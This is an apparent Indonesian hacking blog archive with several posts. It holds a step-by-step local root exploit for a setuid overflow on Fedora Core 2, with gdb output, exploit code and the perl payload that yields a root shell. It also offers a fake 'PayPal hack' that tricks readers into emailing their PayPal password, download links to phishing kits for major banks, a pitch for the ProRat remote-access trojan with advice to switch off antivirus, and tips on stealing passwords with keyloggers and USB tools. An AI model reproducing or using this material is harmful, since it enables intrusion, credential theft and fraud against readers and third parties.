Archives

gravatar

Tehnik hacking local root on Fedore core 2


Tehnik hacking local root on Fedore core 2This is a featured page

Mari membuat program bahasa c yang simpel untuk test vulnerability
[dokter@localhost fedora]$ cat vul.c
int main(int argc, char *argv[])
{
char buffer[256];
strcpy(buffer,argv[1]);
return 0;
}
sekarang mari kita kompilasi
[dokter@localhost fedora]$ gcc -o vul vul.c
dan sekarang mari kita buat sesuatu untuk sebuah test yang sempurna
[dokter@localhost fedora]$ su
Password:
[root@localhost fedora]# chgrp root vul
[root@localhost fedora]# chown root vul
[root@localhost fedora]# chmod 4755 vul
[root@localhost fedora]# ls -l vul
-rwsr-xr-x 1 root root 4733 11?12 23:11 vul
[root@localhost fedora]# su dokter
[dokter@localhost fedora]$
nah sekarang kamu siap menyerang program vulnerability....
dan langkah pertama yang harus kamu jalanin adalah mencari alamat dari
<execl+3> dengan menggunakan GDB
gdb apaan tuh ? pasti kamu bertanya.... jawaban nya ... use your imajination
hehehehehe
[dokter@localhost fedora]$ gdb vul
40
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using
host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
: ?
&#44611;&#45228;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared
library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Breakpoint 1, 0x08048379 in main ()
(gdb) disas execl
Dump of assembler code for function execl:
0x005fea00 <execl+0>: push %ebp
0x005fea01 <execl+1>: mov %esp,%ebp
0x005fea03 <execl+3>: lea 0x10(%ebp),%eax
0x005fea06 <execl+6>: push %edi
0x005fea07 <execl+7>: push %esi
0x005fea08 <execl+8>: push %ebx
0x005fea09 <execl+9>: sub $0x1030,%esp
0x005fea0f <execl+15>: mov 0xc(%ebp),%ecx
0x005fea12 <execl+18>: movl $0x400,0xfffffff0(%ebp)
0x005fea19 <execl+25>: lea 0x1b(%esp),%esi
0x005fea1d <execl+29>: and $0xfffffff0,%esi
0x005fea20 <execl+32>: call 0x58c90d <__i686.get_pc_thunk.bx>
0x005fea25 <execl+37>: add $0x905d7,%ebx
0x005fea2b <execl+43>: mov %ecx,(%esi)
0x005fea2d <execl+45>: test %ecx,%ecx
0x005fea2f <execl+47>: mov %eax,0xffffffe8(%ebp)
0x005fea32 <execl+50>: movl $0x1,0xffffffec(%ebp)
0x005fea39 <execl+57>: je 0x5fea73 <execl+115>
0x005fea3b <execl+59>: movl $0x1a,0xffffffe0(%ebp)
0x005fea42 <execl+66>: lea 0x0(%esi),%esi
0x005fea49 <execl+73>: lea 0x0(%edi),%edi
0x005fea50 <execl+80>: mov 0xfffffff0(%ebp),%edx
0x005fea53 <execl+83>: cmp %edx,0xffffffec(%ebp)
0x005fea56 <execl+86>: je 0x5fea96 <execl+150>
0x005fea58 <execl+88>: addl $0x8,0xffffffe0(%ebp)
0x005fea5c <execl+92>: mov 0xffffffe8(%ebp),%edx
0x005fea5f <execl+95>: mov 0xffffffec(%ebp),%edi
0x005fea62 <execl+98>: addl $0x4,0xffffffe8(%ebp)
0x005fea66 <execl+102>: mov (%edx),%ecx
0x005fea68 <execl+104>: mov %ecx,(%esi,%edi,4)
0x005fea6b <execl+107>: inc %edi
0x005fea6c <execl+108>: test %ecx,%ecx
0x005fea6e <execl+110>: mov %edi,0xffffffec(%ebp)
0x005fea71 <execl+113>: jne 0x5fea50 <execl+80>
0x005fea73 <execl+115>: mov 0xfffffee0(%ebx),%edi
0x005fea79 <execl+121>: mov (%edi),%ecx
0x005fea7b <execl+123>: mov %esi,0x4(%esp)
0x005fea7f <execl+127>: mov 0x8(%ebp),%esi
0x005fea82 <execl+130>: mov %ecx,0x8(%esp)
0x005fea86 <execl+134>: mov %esi,(%esp)
0x005fea89 <execl+137>: call 0x5fe7a0 <execve>
0x005fea8e <execl+142>: lea 0xfffffff4(%ebp),%esp
0x005fea91 <execl+145>: pop %ebx
0x005fea92 <execl+146>: pop %esi
41
0x005fea93 <execl+147>: pop %edi
0x005fea94 <execl+148>: pop %ebp
0x005fea95 <execl+149>: ret
0x005fea96 <execl+150>: mov 0xffffffec(%ebp),%edx
0x005fea99 <execl+153>: mov 0xffffffe0(%ebp),%ecx
0x005fea9c <execl+156>: add %edx,%edx
0x005fea9e <execl+158>: mov %edx,0xffffffe4(%ebp)
0x005feaa1 <execl+161>: and $0xfffffffc,%ecx
0x005feaa4 <execl+164>: sub %ecx,%esp
0x005feaa6 <execl+166>: mov %edx,0xfffffff0(%ebp)
0x005feaa9 <execl+169>: mov 0xffffffe4(%ebp),%eax
0x005feaac <execl+172>: lea 0x1b(%esp),%edx
0x005feab0 <execl+176>: and $0xfffffff0,%edx
0x005feab3 <execl+179>: lea (%eax,%edx,1),%edi
0x005feab6 <execl+182>: cmp %esi,%edi
0x005feab8 <execl+184>: je 0x5feacc <execl+204>
0x005feaba <execl+186>: cld
0x005feabb <execl+187>: mov 0xffffffec(%ebp),%ecx
0x005feabe <execl+190>: mov %edx,%edi
0x005feac0 <execl+192>: shl $0x2,%ecx
0x005feac3 <execl+195>: shr $0x2,%ecx
0x005feac6 <execl+198>: repz movsl %ds:(%esi),%es:(%edi)
0x005feac8 <execl+200>: mov %edx,%esi
0x005feaca <execl+202>: jmp 0x5fea58 <execl+88>
0x005feacc <execl+204>: cld
0x005feacd <execl+205>: mov 0xffffffec(%ebp),%ecx
0x005fead0 <execl+208>: mov %edx,%edi
0x005fead2 <execl+210>: shl $0x2,%ecx
0x005fead5 <execl+213>: shr $0x2,%ecx
0x005fead8 <execl+216>: repz movsl %ds:(%esi),%es:(%edi)
0x005feada <execl+218>: mov %edx,%esi
0x005feadc <execl+220>: mov 0xffffffe4(%ebp),%edi
0x005feadf <execl+223>: mov 0xffffffec(%ebp),%eax
0x005feae2 <execl+226>: add %eax,%edi
0x005feae4 <execl+228>: mov %edi,0xfffffff0(%ebp)
0x005feae7 <execl+231>: jmp 0x5fea58 <execl+88>
0x005feaec <execl+236>: nop
0x005feaed <execl+237>: nop
0x005feaee <execl+238>: nop
0x005feaef <execl+239>: nop
End of assembler dump.
(gdb) q
The program is running. Exit anyway? (y or n) y
nah puyeng kan loe ... yang di atas itu apaan??
sama gue juga puyeng ...
tapi jangan menyerah
keep moving lolz
[dokter@localhost fedora]$
alasan nya kita tidak punya alamat dari <execl+0> atau <execl+1> karna
nilai dari %ebp mungkin berubah bila "push %ebp" atau "mov %esp,%ebp"
di eksekusi. kita temukan alamat dari <execl+3> sangat gampang dengan
mengunakan gdb: 0x005fea03.
nah dari mana dapat nya tuh... jawaban nya tetep sama .... use your imajination.
loh kok gitu jawaban nya.... pasti kamu berkata gitu... karna kalo di jelaskan
panjang banget
bro....
hikz
42
:(
mari kita lanjutkan lagi
hajar.....
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x8048379
(gdb) r
Starting program: /home/dokter/fedora/vul
Error while mapping shared library sections:
: ?
&#44611;&#45228;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared
library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Error while reading shared library symbols:
: &#27961;&#47747;?&#28479;&#20350; &#25033;&#51343;&#51338;&#9473;&#23195; &#22777;.
Breakpoint 1, 0x08048379 in main ()
(gdb) x/50x 0x8049000
0x8049000: 0x464c457f 0x00010101 0x00000000 0x00000000
0x8049010: 0x00030002 0x00000001 0x080482c0 0x00000034
0x8049020: 0x00000788 0x00000000 0x00200034 0x00280007
0x8049030: 0x0019001c 0x00000006 0x00000034 0x08048034
0x8049040: 0x08048034 0x000000e0 0x000000e0 0x00000005
0x8049050: 0x00000004 0x00000003 0x00000114 0x08048114
0x8049060: 0x08048114 0x00000013 0x00000013 0x00000004
0x8049070: 0x00000001 0x00000001 0x00000000 0x08048000
0x8049080: 0x08048000 0x0000047c 0x0000047c 0x00000005
0x8049090: 0x00001000 0x00000001 0x0000047c 0x0804947c
0x80490a0: 0x0804947c 0x00000100 0x00000104 0x00000006
0x80490b0: 0x00001000 0x00000002 0x00000490 0x08049490
0x80490c0: 0x08049490 0x000000c8
(gdb)
0x80490c8: 0x000000c8 0x00000006 0x00000004 0x00000004
0x80490d8: 0x00000128 0x08048128 0x08048128 0x00000020
0x80490e8: 0x00000020 0x00000004 0x00000004 0x6474e551
0x80490f8: 0x00000000 0x00000000 0x00000000 0x00000000
0x8049108: 0x00000000 0x00000006 0x00000004 0x62696c2f
0x8049118: 0x2d646c2f 0x756e696c 0x6f732e78 0x0000322e
0x8049128: 0x00000004 0x00000010 0x00000001 0x00554e47
0x8049138: 0x00000000 0x00000002 0x00000002 0x00000005
0x8049148: 0x00000003 0x00000006 0x00000004 0x00000001
0x8049158: 0x00000005 0x00000000 0x00000000 0x00000000
0x8049168: 0x00000000 0x00000003 0x00000002 0x00000000
0x8049178: 0x00000000 0x00000000 0x00000000 0x00000044
0x8049188: 0x00000000 0x000000ef
(gdb)
0x8049190: 0x00000012 0x00000035 0x08048474 0x00000004
0x80491a0: 0x000e0011 0x00000001 0x00000000 0x00000000
0x80491b0: 0x00000020 0x00000015 0x00000000 0x00000000
0x80491c0: 0x00000020 0x0000002e 0x00000000 0x00000030
0x80491d0: 0x00000012 0x764a5f00 0x6765525f 0x65747369
0x80491e0: 0x616c4372 0x73657373 0x675f5f00 0x5f6e6f6d
0x80491f0: 0x72617473 0x005f5f74 0x6362696c 0x2e6f732e
0x8049200: 0x74730036 0x79706372 0x4f495f00 0x6474735f
0x8049210: 0x755f6e69 0x00646573 0x696c5f5f 0x735f6362
0x8049220: 0x74726174 0x69616d5f 0x4c47006e 0x5f434249
0x8049230: 0x00302e32 0x00020000 0x00000001 0x00020000
0x8049240: 0x00010001 0x00000024 0x00000010 0x00000000
0x8049250: 0x0d696910 0x00020000
(gdb)
0x8049258: 0x00000056 0x00000000 0x08049558 0x00000406
43
0x8049268: 0x08049568 0x00000107 0x0804956c 0x00000507
0x8049278: 0x83e58955 0x61e808ec 0xe8000000 0x000000bc
0x8049288: 0x0001a3e8 0x00c3c900 0x956035ff 0x25ff0804
0x8049298: 0x08049564 0x00000000 0x956825ff 0x00680804
0x80492a8: 0xe9000000 0xffffffe0 0x956c25ff 0x08680804
0x80492b8: 0xe9000000 0xffffffd0 0x895eed31 0xf0e483e1
0x80492c8: 0x68525450 0x080483ec 0x0483a468 0x68565108
0x80492d8: 0x08048370 0xffffbfe8 0x9090f4ff 0x53e58955
0x80492e8: 0x000000e8 0xc3815b00 0x0000126f 0xfc838b50
0x80492f8: 0x85ffffff 0xff0274c0 0xfc5d8bd0 0x9090c3c9
0x8049308: 0x83e58955 0x3d8008ec 0x0804957c 0xa1297500
0x8049318: 0x08049578 0xd285108b
(gdb)
0x8049320: 0xf6891774 0xa304c083 0x08049578 0x78a1d2ff
0x8049330: 0x8b080495 0x75d28510 0x7c05c6eb 0x01080495
0x8049340: 0xf689c3c9 0x83e58955 0x8ca108ec 0x85080494
0x8049350: 0xb81974c0 0x00000000 0x1074c085 0x680cec83
0x8049360: 0x0804948c 0xc483d0ff 0x00768d10 0x9090c3c9
0x8049370: 0x81e58955 0x000108ec 0xf0e48300 0x000000b8
0x8049380: 0x83c42900 0x458b08ec 0x04c0830c 0x858d30ff
0x8049390: 0xfffffef8 0xff16e850 0xc483ffff 0x0000b810
0x80493a0: 0xc3c90000 0x57e58955 0xec835356 0x0000e80c
0x80493b0: 0x815b0000 0x0011aac3 0xfebae800 0x938dffff
0x80493c0: 0xffffff20 0xff208b8d 0xca29ffff 0xfac1f631
0x80493d0: 0x73d63902 0x90d7890f 0x20b394ff 0x46ffffff
0x80493e0: 0xf472fe39 0x5b0cc483
(gdb)
0x80493e8: 0xc3c95f5e 0x56e58955 0x0000e853 0x815b0000
0x80493f8: 0x001166c3 0x208b8d00 0x8dffffff 0xffff2083
0x8049408: 0xc1c129ff 0xc98502f9 0x75ff718d 0x003ae80b
0x8049418: 0x5e5b0000 0xf689c3c9 0x20b394ff 0x89ffffff
0x8049428: 0xd2854ef2 0xe5ebf275 0x53e58955 0x947ca152
0x8049438: 0xf8830804 0x947cbbff 0x0c740804 0xff04eb83
0x8049448: 0x83038bd0 0xf475fff8 0xc3c95b58 0x53e58955
0x8049458: 0x000000e8 0xc3815b00 0x000010ff 0xfe9ee852
0x8049468: 0x5d8bffff 0x00c3c9fc 0x00000003 0x00020001
0x8049478: 0x00000000 0xffffffff 0x00000000 0xffffffff
0x8049488 <__DTOR_END__>: 0x00000000 0x00000000 0x00000001
0x00000024
0x8049498 <_DYNAMIC+8>: 0x0000000c 0x08048278 0x0000000d 0x08048454
0x80494a8 <_DYNAMIC+24>: 0x00000004 0x08048148
(gdb)
0x80494b0 <_DYNAMIC+32>: 0x00000005 0x080481d4 0x00000006
0x08048174
0x80494c0 <_DYNAMIC+48>: 0x0000000a 0x00000060 0x0000000b
0x00000010
0x80494d0 <_DYNAMIC+64>: 0x00000015 0x005714b8 0x00000003
0x0804955c
0x80494e0 <_DYNAMIC+80>: 0x00000002 0x00000010 0x00000014
0x00000011
0x80494f0 <_DYNAMIC+96>: 0x00000017 0x08048268 0x00000011
0x08048260
0x8049500 <_DYNAMIC+112>: 0x00000012 0x00000008 0x00000013
0x00000008
0x8049510 <_DYNAMIC+128>: 0x6ffffffe 0x08048240 0x6fffffff
0x00000001
0x8049520 <_DYNAMIC+144>: 0x6ffffff0 0x08048234 0x00000000
0x00000000
0x8049530 <_DYNAMIC+160>: 0x00000000 0x00000000 0x00000000
0x00000000
0x8049540 <_DYNAMIC+176>: 0x00000000 0x00000000 0x00000000
0x00000000
0x8049550 <_DYNAMIC+192>: 0x00000000 0x00000000 0x00000000
0x08049490
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0x005714d0 0x00566830 0x0058c9f0
0x080482b6
0x8049570 <data_start>: 0x00000000 0x00000000
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6
0x00000000
44
0x8049574 <__dso_handle>: 0x00000000 0x08049488 0x00000000
0x00000000
(gdb)
nah loh
apaan lagi tuh... puyeng kan loe... sama gue juga puyeng.. apaan nih ya??
tapi jangan khawatir karna kita temukan bagian yang bisa di gunakan dari
execl(). penjelasan nya seperti ini :
execl(char *path, char *arg0,...,char *argn, 0);
seperti yang kamu liat, akhir dari argumen dari execl() pasti null ( alias kosong )
jadi kamu bisa menggunakan argumen dari execl() itu. ini penjeleasan yang lebih
detail
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00566830 0x0058c9f0 0x080482b6 0x00000000
---------- ---------- ----------
kita akan menggunakan execl() seperti "execl(0x8049568, 0x804956c,
0x8049570)". Kita harus menggunakan nilai dari alamat karna argumennya
pasti sebuah pointer.
ini penjelasan lebih detail
(gdb) x/8x 0x0058c9f0
0x58c9f0 <__libc_start_main>: 0x57e58955 0xec835356 0x0c458b4c 0xe810558b
---------- ---------- ---------- ---------
-
0x58ca00 <__libc_start_main+16>: 0xffffff09 0x25f8c381 0x7d8b0010 0x1c758b18
---------- ---------- --
(gdb) x/8x 0x080482b6
0x80482b6 <_init+62>: 0x00000868 0xffd0e900 0xed31ffff 0x83e1895e
0x80482c6 <_start+6>: 0x5450f0e4 0x83ec6852 0xa4680804 0x51080483
(gdb) q
The program is running. Exit anyway? (y or n) y
[dokter@localhost fedora]$
25 bytes' data di 0x0058c9f0 adalah nama file ketika execl() di panggil. jadi kita
perlu membuat sebuah symbolic link dengan data ini. sekarang mari kita
membuat program exploit nya.
program ini harus bisa membuat hak akses kita menjadi (setuid(0)) dari program
vulnerability dan memberi akses root ketika kita sukses menyerang nya... woh...
mantap donk... hehehehehehe
[dokter@localhost fedora]$ cat > exploit.c
#include <unistd.h>
main()
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl("/bin/sh", "sh", 0);
45
}
[dokter@localhost fedora]$ gcc -o exploit exploit.c
mari kita membuat symbolic link untuk exploit dengan nilai dari argument
pertama dari execl().
[dokter@localhost fedora]$ ln -s /home/dokter/fedora/exploit "`perl -e 'print
"\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10",
"\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
mari kita cek symboloic link nya apakah sukses.
[dokter@localhost fedora]$ ls -l
&#21050;&#24616;
24
lrwxrwxrwx 1 dokter dokter 29 11?12 11:28 U??WVS??L?E??U?????????%? ->
/home/dokter/fedora/exploit
-rwxrwxr-x 1 dokter dokter 5186 11?12 11:27 exploit
-rw-rw-r-- 1 dokter dokter 101 11?12 11:27 exploit.c
-rwsr-xr-x 1 root root 4725 11?12 10:31 vul
-rw-rw-r-- 1 dokter dokter 90 11?12 10:31 vul.c
[dokter@localhost fedora]$
mantap... hehehheheheheheh
kalian bisa lihat kan apa yang terjadi dari proses yang terjadi
lanjut.............
pake gdb untuk cari nilai dari alamat nya
[dokter@localhost fedora]$ gdb -q vul
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) disas main
Dump of assembler code for function main:
0x08048370 <main+0>: push %ebp
0x08048371 <main+1>: mov %esp,%ebp
0x08048373 <main+3>: sub $0x108,%esp // 264 bytes are needed to overflow buffer
0x08048379 <main+9>: and $0xfffffff0,%esp
0x0804837c <main+12>: mov $0x0,%eax
0x08048381 <main+17>: sub %eax,%esp
0x08048383 <main+19>: sub $0x8,%esp
0x08048386 <main+22>: mov 0xc(%ebp),%eax
0x08048389 <main+25>: add $0x4,%eax
0x0804838c <main+28>: pushl (%eax)
0x0804838e <main+30>: lea 0xfffffef8(%ebp),%eax
0x08048394 <main+36>: push %eax
0x08048395 <main+37>: call 0x80482b0 <_init+56>
0x0804839a <main+42>: add $0x10,%esp
0x0804839d <main+45>: mov $0x0,%eax
0x080483a2 <main+50>: leave
0x080483a3 <main+51>: ret
End of assembler dump.
(gdb) q
[dokter@localhost fedora]$
sekarang kita dapatkan seluruh data yang kita butuhkan untuk menyerang...
lihat di bawah ini data yang telah kita kumpulkan
+-------------------------+--------------------------------+---------------+
| data to overflow buffer | *first argument of execl() - 8 | *<execl + 3> |
46
+-------------------------+--------------------------------+---------------+
^ ^ ^
| | |
264 bytes 0x8049568 - 8 = 0x8049560 0x5fea03
nah gak terlalu puyeng seperti yang di atas kan ... hehehehhe
jadi data yang kita butuh kan untuk argumen awal dari execl() - 8 pada execl()
bekerja ketika kita memanggil execve() secara internal dan execve() referensi dari
ebp+8 ketika kita mengambil pointer dari nama file tersebut.
Mari kita lanjutkan serangan terakhir
[dokter@localhost fedora]$ ./vul `perl -e 'print
"A"x264,"\x60\x95\x04\x08\x03\xea\x5f"'`
sh-2.05b# id
uid=0(root) gid=501(dokter) groups=501(dokter)
sh-2.05b# whoami
root
sh-2.05b#
wew root bo``` mantap
kita dapat root...
tau kan mo ngapain lagi...
hehehehhehe
=====================================================================
WARNING !!!
saya tidak bertanggung jawab atas penyalah gunaan dari artikel ini ini hanya
sebagai ilmu pengetahuan belaka
jadi sekali lagi ...
PLEASE DONT TRY THIS AT OTHER PEOPLE PCS
TRY THIS WITH YOUR OWN RISK
DOKTER^CINTA

gravatar

hack paypal


Cara mengcrack yang akan kami ajarkan kepada anda adalah cara mengcrack tingkat tinggi karena disini anda akan kami ajarkan bahasa pemograman demi mendukung pencurian account pay pal ini. tapi, sebelum anda me-hack paypal, pastikan akun paypal anda sudah verified.
Metode pengcrackkan ini sangat rahasia dan tidak akan terlacak bila anda mengikuti saran-saran
dan langkah-langkah yang saya ajarkan dengan benar dan baik. Saya tidak menjamin metode ini berhasil karena, ada kemungkinan perusahaan paypal telah memperbaiki kelemahan sistemnya. Tapi anda tidak usah khawatir karena indocracker slalu di update setiap hari

Baiklah, Kita mulai Saja!

setelah member mendaftar di paypal, maka paypal mengirim e-mail yang meminta membernya untuk memasukkan informasi kartu kredit. Setelah member memasukkan informasi kartu kredit, maka paypal otomatis mengirim kembali informasi-informasi itu ke dalam mailerbot. Dalam kasus ini kita memakai mailerbot berakthru. NAHH!! yang akan kita crack adalah, kita akan membuat "confused" yahoo maillerbot sehingga kita bisa mendapatkan informasi-informasi tentang username/password yang tersimpan di servernya. untuk melakukannya, silahkan ikuti intruksi dan petunjuk-petunjuk berikut. tapi ingat!!! tolong ikuti saran-saran kami:

1.masuklah(log in) ke account paypal anda
2. Klik "street address" yang terletak di bawah "account information"
3. disana anda akan melihat e-mail yang anda masukkan ketika mendaftar paypal. hafalkan alamat e-mail anda tersebut itu. lalu masuk ke e-mail anda yang lain (dalam hal ini, yahoo).
Sebelum anda mengikuti intruksi selanjutnya, syarat-syarat yang harus anda penuhi adalah:
a. Anda harus telah mengkonfirmasikan credit card /debit card Yang tanggal kadaluarsa (Exp date) nya 
1 tahun
 ke dalam account anda tersebut, dengan kata lain, account paypal anda harus "verified".

Tapi ingat, sekali lagi.. kartu kredit atau debit yang anda masukkan ke akun paypal anda harus memiliki tanggal kadaluarsa atau exp date minimal 1 tahun dari sekarang. ini adalah salah satu trik paypal agar database mailerbootnya tidak dicuri.

Persyaratan anda tersebut harus anda ikuti karena anda tidak bisa mengakses mailerbot yang menyimpan informasi tentang user lainnya jika anda sendiri saja belum masuk ke mailerbot itu sendiri.
dan jika anda telah mengkonfirmasi credit card atau paypal anda telah terverifikasi, maka secara otomatis anda telah disimpan di mailerbot paypal.
4. oke!!! paypal SAAT INI memiliki 2 mailerbot . yaitu, yahoo dan hotmail
kita mulai dengan anda yang menggunakan yahoo!. masuklah ke e-mail yahoo anda tersebut:

Subjek: indo3534paypal78verif-De24 (untuk membuat bingung yahoo mailerbot)
Kirim : indopaypalaccess61@yahoo.com (mailerboot paypal Indonesia-malaysia)
di bagian isi surat. tulis seperti yang dibawah ini. sama persis dan ikuti saran-sarannya.

In line 1: Content-Type: text/plain;
In line 2: charset=us-ascii (Untuk membuat balasan dari paypal bisa dibaca (tidak berbentuk bahasa pemograman))
In line 3: address000%%confirmation0e24.yaIn
In line 4: p38ylec00rm::s%%http://www.paypal.com/%% (untuk membuat mailerbot meminta kembali infomasi dari paypal)
In line 5: e-mail paypal anda(saya meminta anda untuk masuk ke email yahoo anda yang lain adalah agar anda tidak dianggap spam/hacker sehingga tidak ada tanggapan dari paypal. jadi, dengan anda memasukkan email (yang sudah terkonfirmasi ke paypal) maka, anda tidak akan dianggap spam dan hacker. karena, anda telah terdaftar sebagai member paypal. .)
In line 6: start (retrieve > 0) (untuk memfungsikan mailerbot yahoo)
In line 7: verified (*value= = float) (untuk membuat mailerbot berfungsi walau ada proteksi dari paypal)
In line 8: PayPal password anda (sekarang masukkan password paypal anda sehingga anda tidak dianggap spam/hacker, sehingga otomatis mailerbot akan mengirim informasi-informasi user lainnya ke e-mail paypal anda dengan valid..)
In line 9: #searchmsgend%EcHvld%%hr# (untuk mendapatkan informasi-informasi user Secara acak)
In line 10 send&&idR20394-tsa-0583 (membuat mailerbot mengirimkan semua informasi-informasinya ke e-mail anda)
In line 11 #endofmsg (langkah terakhir)
in line 12: #IP=#136.112.213:8080# = value(untuk mengubah IP address anda demi keamanan anda) 

Nb: Jangan merubah sedikitpun scrpt diatas, atau tidak akan bekerja. dan hapuslah tulisan "line 1...12"


Setelah anda mengirim e-mail tersebut.. tunggu beberapa menit dan periksa e-mail anda. Ini hasil printscreen
e-mail balasan dari mailerboot yang confused:
[Untitled]

Setelah itu, buka e-mailnya. dan akan muncul tampilan seperti ini:
hacking paypal - Indocracker.wetpaint.com:: Cracker


hacking paypal
Langkah selanjutnya, tentu buka paypal.com dan login: ini hasilnya.



IndoCracker.wetpaint.com::Belajar Cracking Home - Indocracker.wetpaint.com:: Cracker


bukti

bukti2

gravatar

page scam gratis

BankOfAmerica => http://abhie.org/bankofamerica.zip
AOL => http://abhie.org/aol.com.zip
Paypal Fr + Scam Letter => http://abhie.org/paypal.fr.zip
Wachovia => http://abhie.org/wachovia.com.zip

yang laen menyusul....

gravatar

hack komputer orang


nyoba-hack-komputer-orang-laen
Tengah malam sambil nonton bola gw browsing2, n disalah satu forum dari thread-a Heikhal nemuin ProRat. Sebuah tool untuk nyusup ke Pc orang laen. Kalo ntuk cara kerja-a seh praktis, yg pnting tau IP target n Port, download aja dulu n cobain. Tp kalo da bisa jgn disalah gunain. Setelah download, matikan dulu anti virus sebelum ekstrak. Tp tenang aja al-a bukan virus tp hanya terdeteksi dianggap sebagai virus. Oia… Pass untuk zip-a = pro DOWNLOAD

gravatar

hack ip

untuk hack IP address (agar IP address kita berubah, caranya gampang bgt).
pergi kesini, dan tinggal masukkan URL yang anda tuju:

http://anonymizer.nntime.com/

download pengubah IP address disini

http://www.unrestrictedsurf.com/

Cuma segitu aja, semoga berguna!!

gravatar

bagaimana cara menjadi hacker?


Banyak cara menjadi seorang hacker, dari cara yang paling mudah hingga cara yang paling sulit. Beberapa orang memakai software untuk melakukan hack.Cara yang dipakai hacker untuk melakukan hack diantaranya pirates facebook,keylogger,mail passview,messenpass,social engineering,web spoofing,menghadang email,password cracking,session hijacking,menjadi proxy server,memanfaatkan kelalaian user dalam menggunakan fitur browser, dan googling.
Pirates facebook
merupakan software yang bekerja dengan menggunakan nomor id facebook serta IP address facebook. Cara ini memang langsung menemukan kita pada email dan password korban namun yang mempersulit kita dalam pemakaian software ini adalah mengetikan IP Address. IP Address selalu berubah dalam waktu yang sangat singkat,dalam hitungan detik. Untuk menggunakan software ini diperlukan kerja keras,semangat dan kecepatan.
Mail PassView dan MessenPass
berfungsi untuk mengetahui password yahoo messenger. Penggunaan software ini sangat simple dengan mendownload software ini di website www.nirsoft.net kemudian menyimpan file tersebut di flashdisk dan memasukkannya pada computer korban. Software tersebut bekerja dalam hitungan 3 detik. Jadi, anda dapat melakukannya dengan mencolokkan flashdisk pada computer korban kemudian klik software tersebut. Dalam hitungan detik software bekerja mengcopy semua password yang pernah diketik pada computer korban.
Social Engineering
adalah nama suatu teknik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban. Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban. Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah – olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga. Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. Sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.
KeyLogger
adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti formpassword misalnya. Ada cara aman untuk menghindari keyloger:
  1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakankeyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasangkeyloger) tidak akan mendapatkan password anda yang sebenarnya.
  2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat inginmemasukkan password, tingal copy-paste ajah. Keyloger akan membaca passwordanda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.
